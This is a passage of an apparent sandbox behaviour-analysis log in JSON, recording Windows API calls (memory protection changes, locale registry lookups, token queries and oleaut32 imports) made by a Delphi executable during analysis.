"category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x00400000" }, { "name": "ModuleName", "value": "f1e62c0e7345fc825586.exe" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "OldAccessProtection", "value": "0x00000040", "pretty_value": "PAGE_EXECUTE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 457 }, { "timestamp": "2025-03-02 21:32:33,045", "thread_id": "7632", "caller": "0x004e73f4", "parentcaller": "0x00000000", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x00401000" }, { "name": "ModuleName", "value": "f1e62c0e7345fc825586.exe" }, { "name": "NumberOfBytesProtected", "value": "0x0008e000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000020", "pretty_value": "PAGE_EXECUTE_READ" }, { "name": "OldAccessProtection", "value": "0x00000040", "pretty_value": "PAGE_EXECUTE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 458 }, { "timestamp": "2025-03-02 21:32:33,170", "thread_id": "7632", "caller": "0x004e73f4", "parentcaller": "0x00000000", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x0048f000" }, { "name": "ModuleName", "value": "f1e62c0e7345fc825586.exe" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000020", "pretty_value": "PAGE_EXECUTE_READ" }, { "name": "OldAccessProtection", "value": "0x00000040", "pretty_value": "PAGE_EXECUTE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 459 }, { "timestamp": "2025-03-02 21:32:33,170", "thread_id": "7632", "caller": "0x004e73f4", "parentcaller": "0x00000000", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x00490000" }, { "name": "ModuleName", "value": "f1e62c0e7345fc825586.exe" }, { "name": "NumberOfBytesProtected", "value": "0x00003000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "OldAccessProtection", "value": "0x00000040", "pretty_value": "PAGE_EXECUTE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 460 }, { "timestamp": "2025-03-02 21:32:33,170", "thread_id": "7632", "caller": "0x004e73f4", "parentcaller": "0x00000000", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x00493000" }, { "name": "ModuleName", "value": "f1e62c0e7345fc825586.exe" }, { "name": "NumberOfBytesProtected", "value": "0x00004000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "OldAccessProtection", "value": "0x00000040", "pretty_value": "PAGE_EXECUTE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 461 }, { "timestamp": "2025-03-02 21:32:33,170", "thread_id": "7632", "caller": "0x004e73f4", "parentcaller": "0x00000000", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x00497000" }, { "name": "ModuleName", "value": "f1e62c0e7345fc825586.exe" }, { "name": "NumberOfBytesProtected", "value": "0x00003000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "OldAccessProtection", "value": "0x00000040", "pretty_value": "PAGE_EXECUTE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 462 }, { "timestamp": "2025-03-02 21:32:33,170", "thread_id": "7632", "caller": "0x004e73f4", "parentcaller": "0x00000000", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x0049a000" }, { "name": "ModuleName", "value": "f1e62c0e7345fc825586.exe" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "OldAccessProtection", "value": "0x00000040", "pretty_value": "PAGE_EXECUTE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 463 }, { "timestamp": "2025-03-02 21:32:33,170", "thread_id": "7632", "caller": "0x004e73f4", "parentcaller": "0x00000000", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x0049b000" }, { "name": "ModuleName", "value": "f1e62c0e7345fc825586.exe" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "OldAccessProtection", "value": "0x00000040", "pretty_value": "PAGE_EXECUTE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 464 }, { "timestamp": "2025-03-02 21:32:33,170", "thread_id": "7632", "caller": "0x004e73f4", "parentcaller": "0x00000000", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x0049c000" }, { "name": "ModuleName", "value": "f1e62c0e7345fc825586.exe" }, { "name": "NumberOfBytesProtected", "value": "0x00009000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "OldAccessProtection", "value": "0x00000040", "pretty_value": "PAGE_EXECUTE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 465 }, { "timestamp": "2025-03-02 21:32:33,279", "thread_id": "7632", "caller": "0x004e73ff", "parentcaller": "0x00000000", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x00400000" }, { "name": "ModuleName", "value": "f1e62c0e7345fc825586.exe" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000040", "pretty_value": "PAGE_EXECUTE_READWRITE" }, { "name": "OldAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 466 }, { "timestamp": "2025-03-02 21:32:33,279", "thread_id": "7632", "caller": "0x0040619b", "parentcaller": "0x00405f24", "category": "registry", "api": "RegOpenKeyExA", "status": false, "return": "0x00000002", "arguments": [ { "name": "Registry", "value": "0x80000001", "pretty_value": "HKEY_CURRENT_USER" }, { "name": "SubKey", "value": "Software\\Borland\\Locales" }, { "name": "Handle", "value": "0x00000000" }, { "name": "FullName", "value": "HKEY_CURRENT_USER\\Software\\Borland\\Locales" } ], "repeated": 0, "id": 467 }, { "timestamp": "2025-03-02 21:32:33,279", "thread_id": "7632", "caller": "0x004061b9", "parentcaller": "0x00405f24", "category": "registry", "api": "RegOpenKeyExA", "status": false, "return": "0x00000002", "arguments": [ { "name": "Registry", "value": "0x80000002", "pretty_value": "HKEY_LOCAL_MACHINE" }, { "name": "SubKey", "value": "Software\\Borland\\Locales" }, { "name": "Handle", "value": "0x00000000" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\Software\\Borland\\Locales" } ], "repeated": 0, "id": 468 }, { "timestamp": "2025-03-02 21:32:33,279", "thread_id": "7632", "caller": "0x004061d7", "parentcaller": "0x00405f24", "category": "registry", "api": "RegOpenKeyExA", "status": false, "return": "0x00000002", "arguments": [ { "name": "Registry", "value": "0x80000001", "pretty_value": "HKEY_CURRENT_USER" }, { "name": "SubKey", "value": "Software\\Borland\\Delphi\\Locales" }, { "name": "Handle", "value": "0x00000000" }, { "name": "FullName", "value": "HKEY_CURRENT_USER\\Software\\Borland\\Delphi\\Locales" } ], "repeated": 0, "id": 469 }, { "timestamp": "2025-03-02 21:32:33,279", "thread_id": "7632", "caller": "0x00406290", "parentcaller": "0x00405f24", "category": "registry", "api": "NtOpenKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x0000023c" }, { "name": "DesiredAccess", "value": "0x00020019", "pretty_value": "KEY_READ" }, { "name": "ObjectAttributesHandle", "value": "0x00000000" }, { "name": "ObjectAttributesName", "value": "\\Registry\\Machine\\System\\CurrentControlSet\\Control\\Nls\\CustomLocale" }, { "name": "ObjectAttributes", "value": "HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control\\Nls\\CustomLocale" } ], "repeated": 0, "id": 470 }, { "timestamp": "2025-03-02 21:32:33,279", "thread_id": "7632", "caller": "0x00406290", "parentcaller": "0x00405f24", "category": "registry", "api": "NtQueryValueKey", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x0000023c" }, { "name": "ValueName", "value": "es-ES" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\CustomLocale\\es-ES" } ], "repeated": 0, "id": 471 }, { "timestamp": "2025-03-02 21:32:33,279", "thread_id": "7632", "caller": "0x00406290", "parentcaller": "0x00405f24", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000023c" } ], "repeated": 0, "id": 472 }, { "timestamp": "2025-03-02 21:32:33,279", "thread_id": "7632", "caller": "0x00406290", "parentcaller": "0x00405f24", "category": "registry", "api": "NtOpenKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x0000023c" }, { "name": "DesiredAccess", "value": "0x00020019", "pretty_value": "KEY_READ" }, { "name": "ObjectAttributesHandle", "value": "0x00000000" }, { "name": "ObjectAttributesName", "value": "\\Registry\\Machine\\System\\CurrentControlSet\\Control\\Nls\\ExtendedLocale" }, { "name": "ObjectAttributes", "value": "HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control\\Nls\\ExtendedLocale" } ], "repeated": 0, "id": 473 }, { "timestamp": "2025-03-02 21:32:33,279", "thread_id": "7632", "caller": "0x00406290", "parentcaller": "0x00405f24", "category": "registry", "api": "NtQueryValueKey", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x0000023c" }, { "name": "ValueName", "value": "es-ES" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\ExtendedLocale\\es-ES" } ], "repeated": 0, "id": 474 }, { "timestamp": "2025-03-02 21:32:33,279", "thread_id": "7632", "caller": "0x00406290", "parentcaller": "0x00405f24", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000023c" } ], "repeated": 0, "id": 475 }, { "timestamp": "2025-03-02 21:32:33,279", "thread_id": "7632", "caller": "0x00406290", "parentcaller": "0x00405f24", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "10" }, { "name": "TokenInformation", "value": "\\xcdb\\x9c\\x02\\x00\\x00\\x00\\x00U\\xef\n\\x00\\x00\\x00\\x00\\x00\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\x7f\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x10\\x00\\x00\\x94\\x0f\\x00\\x00\\x0e\\x00\\x00\\x00\\x18\\x00\\x00\\x00\\xa7i\\x9c\\x02\\x00\\x00\\x00\\x00" } ], "repeated": 0, "id": 476 }, { "timestamp": "2025-03-02 21:32:33,279", "thread_id": "7632", "caller": "0x00406290", "parentcaller": "0x00405f24", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "1" }, { "name": "TokenInformation", "value": "H\\xa2 \\x07\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00\\xad2\\xf3\\xac\\xb0\\xfaz\\xcb\\xa6\\xb55\\xb9\\xe9\\x03\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00" } ], "repeated": 0, "id": 477 }, { "timestamp": "2025-03-02 21:32:33,279", "thread_id": "7632", "caller": "0x00406290", "parentcaller": "0x00405f24", "category": "__notification__", "api": "sysenter", "status": true, "return": "0x00000000", "arguments": [ { "name": "ThreadIdentifier", "value": "7632" }, { "name": "Module", "value": "KERNELBASE.dll" }, { "name": "Return Address", "value": "0x76518e0c" } ], "repeated": 0, "id": 478 }, { "timestamp": "2025-03-02 21:32:33,279", "thread_id": "7632", "caller": "0x0040634a", "parentcaller": "0x00405f24", "category": "filesystem", "api": "NtQueryAttributesFile", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "FileName", "value": "C:\\Users\\pacop\\AppData\\Local\\Temp\\f1e62c0e7345fc825586.ESN" } ], "repeated": 0, "id": 479 }, { "timestamp": "2025-03-02 21:32:33,279", "thread_id": "7632", "caller": "0x0040634a", "parentcaller": "0x00405f24", "category": "filesystem", "api": "NtQueryAttributesFile", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "FileName", "value": "C:\\Users\\pacop\\AppData\\Local\\Temp\\f1e62c0e7345fc825586.ESN.DLL" } ], "repeated": 0, "id": 480 }, { "timestamp": "2025-03-02 21:32:33,279", "thread_id": "7632", "caller": "0x00406380", "parentcaller": "0x00405f24", "category": "filesystem", "api": "NtQueryAttributesFile", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "FileName", "value": "C:\\Users\\pacop\\AppData\\Local\\Temp\\f1e62c0e7345fc825586.ES" } ], "repeated": 0, "id": 481 }, { "timestamp": "2025-03-02 21:32:33,279", "thread_id": "7632", "caller": "0x00406380", "parentcaller": "0x00405f24", "category": "filesystem", "api": "NtQueryAttributesFile", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "FileName", "value": "C:\\Users\\pacop\\AppData\\Local\\Temp\\f1e62c0e7345fc825586.ES.DLL" } ], "repeated": 0, "id": 482 }, { "timestamp": "2025-03-02 21:32:33,279", "thread_id": "7632", "caller": "0x004016bb", "parentcaller": "0x00404abb", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x0a7c0000" }, { "name": "RegionSize", "value": "0x00140000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 483 }, { "timestamp": "2025-03-02 21:32:33,279", "thread_id": "7632", "caller": "0x0040cd77", "parentcaller": "0x00404abb", "category": "system", "api": "NtQueryLicenseValue", "status": true, "return": "0x00000000", "arguments": [ { "name": "Name", "value": "TerminalServices-RemoteConnectionManager-AllowAppServerMode" }, { "name": "Type", "value": "0x00000004" } ], "repeated": 0, "id": 484 }, { "timestamp": "2025-03-02 21:32:33,279", "thread_id": "7632", "caller": "0x0040dc8b", "parentcaller": "0x00404abb", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 485 }, { "timestamp": "2025-03-02 21:32:33,279", "thread_id": "7632", "caller": "0x0040dc9c", "parentcaller": "0x00404abb", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "GetDiskFreeSpaceExA" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75883530" } ], "repeated": 0, "id": 486 }, { "timestamp": "2025-03-02 21:32:33,279", "thread_id": "7632", "caller": "0x0040d5a1", "parentcaller": "0x0040d5ff", "category": "system", "api": "DllLoadNotification", "status": true, "return": "0x00000000", "arguments": [ { "name": "NotificationReason", "value": "load" }, { "name": "DllName", "value": "C:\\Windows\\system32\\uxtheme" }, { "name": "DllBase", "value": "0x74e80000" } ], "repeated": 0, "id": 487 }, { "timestamp": "2025-03-02 21:32:33,279", "thread_id": "7632", "caller": "0x0040d5a1", "parentcaller": "0x0040d5ff", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "C:\\Windows\\System32\\uxtheme.dll" }, { "name": "BaseAddress", "value": "0x74e80000" } ], "repeated": 0, "id": 488 }, { "timestamp": "2025-03-02 21:32:33,279", "thread_id": "7632", "caller": "0x0040eb82", "parentcaller": "0x0048f142", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "oleaut32.dll" }, { "name": "ModuleHandle", "value": "0x76d90000" } ], "repeated": 0, "id": 489 }, { "timestamp": "2025-03-02 21:32:33,279", "thread_id": "7632", "caller": "0x0040eb66", "parentcaller": "0x0040eb95", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "oleaut32.dll" }, { "name": "ModuleHandle", "value": "0x76d90000" }, { "name": "FunctionName", "value": "VariantChangeTypeEx" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76dad800" } ], "repeated": 0, "id": 490 }, { "timestamp": "2025-03-02 21:32:33,279", "thread_id": "7632", "caller": "0x0040eb66", "parentcaller": "0x0040ebab", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "oleaut32.dll" }, { "name": "ModuleHandle", "value": "0x76d90000" }, { "name": "FunctionName", "value": "VarNeg" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76df2210" } ], "repeated": 0, "id": 491 }, { "timestamp": "2025-03-02 21:32:33,279", "thread_id": "7632", "caller": "0x0040eb66", "parentcaller": "0x0040ebc1", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "oleaut32.dll" }, { "name": "ModuleHandle", "value": "0x76d90000" }, { "name": "FunctionName", "value": "VarNot" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76df3490" } ], "repeated": 0, "id": 492 }, { "timestamp": "2025-03-02 21:32:33,279", "thread_id": "7632", "caller": "0x0040eb66", "parentcaller": "0x0040ebd7", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "oleaut32.dll" }, { "name": "ModuleHandle", "value": "0x76d90000" }, { "name": "FunctionName", "value": "VarAdd" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76dca890" } ], "repeated": 0, "id": 493 }, { "timestamp": "2025-03-02 21:32:33,279", "thread_id": "7632", "caller": "0x0040eb66", "parentcaller": "0x0040ebed", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "oleaut32.dll" }, { "name": "ModuleHandle", "value": "0x76d90000" }, { "name": "FunctionName", "value": "VarSub" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76dcba20" } ], "repeated": 0, "id": 494 }, { "timestamp": "2025-03-02 21:32:33,279", "thread_id": "7632", "caller": "0x0040eb66", "parentcaller": "0x0040ec03", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "oleaut32.dll" }, { "name": "ModuleHandle", "value": "0x76d90000" }, { "name": "FunctionName", "value": "VarMul" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76dcb150" } ], "repeated": 0, "id": 495 }, { "timestamp": "2025-03-02 21:32:33,279", "thread_id": "7632", "caller": "0x0040eb66", "parentcaller": "0x0040ec19", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "oleaut32.dll" }, { "name": "ModuleHandle", "value": "0x76d90000" }, { "name": "FunctionName", "value": "VarDiv" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76df2730" } ], "repeated": 0, "id": 496 }, { "timestamp": "2025-03-02 21:32:33,279", "thread_id": "7632", "caller": "0x0040eb66", "parentcaller": "0x0040ec2f", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "oleaut32.dll" }, { "name": "ModuleHandle", "value": "0x76d90000" }, { "name": "FunctionName", "value": "VarIdiv" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76df30d0" } ], "repeated": 0, "id": 497 }, { "timestamp": "2025-03-02 21:32:33,279", "thread_id": "7632", "caller": "0x0040eb66", "parentcaller": "0x0040ec45", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "oleaut32.dll" }, { "name": "ModuleHandle", "value": "0x76d90000" }, { "name": "FunctionName", "value": "VarMod" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76df3330" } ], "repeated": 0, "id": 498 }, { "timestamp": "2025-03-02 21:32:33,279", "thread_id": "7632", "caller": "0x0040eb66", "parentcaller": "0x0040ec5b", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "oleaut32.dll" }, { "name": "ModuleHandle", "value": "0x76d90000" }, { "name": "FunctionName", "value": "VarAnd" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76dc09e0" } ], "repeated": 0, "id": 499 }, { "timestamp": "2025-03-02 21:32:33,279", "thread_id": "7632", "caller": "0x0040eb66", "parentcaller": "0x0040ec71", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "oleaut32.dll" }, { "name": "ModuleHandle", "value": "0x76d90000" }, { "name": "FunctionName", "value": "VarOr" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76df3540" } ], "repeated": 0, "id": 500 }, { "timestamp": "2025-03-02 21:32:33,279", "thread_id": "7632", "caller": "0x0040eb66", "parentcaller": "0x0040ec87", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "oleaut32.dll" }, { "name": "ModuleHandle", "value": "0x76d90000" }, { "name": "FunctionName", "value": "VarXor" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76df36e0" } ], "repeated": 0, "id": 501 }, { "timestamp": "2025-03-02 21:32:33,279", "thread_id": "7632", "caller": "0x0040eb66", "parentcaller": "0x0040ec9d", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "oleaut32.dll" }, { "name": "ModuleHandle", "value": "0x76d90000" }, { "name": "FunctionName", "value": "VarCmp" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76da4c00" } ], "repeated": 0, "id": 502 }, { "timestamp": "2025-03-02 21:32:33,279", "thread_id": "7632", "caller": "0x0040eb66", "parentcaller": "0x0040ecb3", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "oleaut32.dll" }, { "name": "ModuleHandle", "value": "0x76d90000" }, { "name": "FunctionName", "value": "VarI4FromStr" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76daac80" } ], "repeated": 0, "id": 503 }, { "timestamp": "2025-03-02 21:32:33,279", "thread_id": "7632", "caller": "0x0040eb66", "parentcaller": "0x0040ecc9", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "oleaut32.dll" }, { "name": "ModuleHandle", "value": "0x76d90000" }, { "name": "FunctionName", "value": "VarR4FromStr" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76dc0680" } ], "repeated": 0, "id": 504 }, { "timestamp": "2025-03-02 21:32:33,279", "thread_id": "7632", "caller": "0x0040eb66", "parentcaller": "0x0040ecdf", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "oleaut32.dll" }, { "name": "ModuleHandle", "value": "0x76d90000" }, { "name": "FunctionName", "value": "VarR8FromStr" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76da7550" } ], "repeated": 0, "id": 505 }, { "timestamp": "2025-03-02 21:32:33,279", "thread_id": "7632", "caller": "0x0040eb66", "parentcaller": "0x0040ecf5", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "oleaut32.dll" }, { "name": "ModuleHandle", "value": "0x76d90000" }, { "name": "FunctionName", "value": "VarDateFromStr" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76dbdec0" } ], "repeated": 0, "id": 506 }, { "timestamp": "2025-03-02 21:32:33,279", "thread_id": "7632", "caller": "0x0040eb66", "parentcaller": "0x0040ed0b", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "oleaut32.dll" }, { "name": "ModuleHandle", "value": "0x76d90000" }, { "name": "FunctionName", "value": "VarCyFromStr" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76df4b10" } ], "repeated": 0, "id": 507 }, { "timestamp": "2025-03-02 21:32:33,279", "thread_id": "7632", "caller": "0x0040eb66", "parentcaller": "0x0040ed21", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "oleaut32.dll" }, { "name": "ModuleHandle", "value": "0x76d90000" }, { "name": "FunctionName", "value": "VarBoolFromStr" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76daaa60" } ], "repeated": 0, "id": 508 }, { "timestamp": "2025-03-02 21:32:33,279", "thread_id": "7632", "caller": "0x0040eb66", "parentcaller": "0x0040ed37", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "oleaut32.dll" }, { "name": "ModuleHandle", "value": "0x76d90000" }, { "name": "FunctionName", "value": "VarBstrFromCy" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76dbd160" } ], "repeated": 0, "id": 509 }, { "timestamp": "2025-03-02 21:32:33,279", "thread_id": "7632", "caller": "0x0040eb66", "parentcaller": "0x0040ed4d", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "oleaut32.dll" }, { "name": "ModuleHandle", "value": "0x76d90000" }, { "name": "FunctionName", "value": "VarBstrFromDate" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76dbdc90" } ], "repeated": 0, "id": 510 }, { "timestamp": "2025-03-02 21:32:33,279", "thread_id": "7632", "caller": "0x0040eb66", "parentcaller": "0x0040ed63", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "oleaut32.dll" }, { "name": "ModuleHandle", "value": "0x76d90000" }, { "name": "FunctionName", "value": "VarBstrFromBool" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76dc0e30" } ], "repeated": 0, "id": 511 }, { "timestamp": "2025-03-02 21:32:33,279", "thread_id": "7632", "caller": "0x0041eaa5", "parentcaller": "0x004281c5", "category": "registry", "api": "RegOpenKeyExA", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x80000002", "pretty_value": "HKEY_LOCAL_MACHINE" }, { "name": "SubKey", 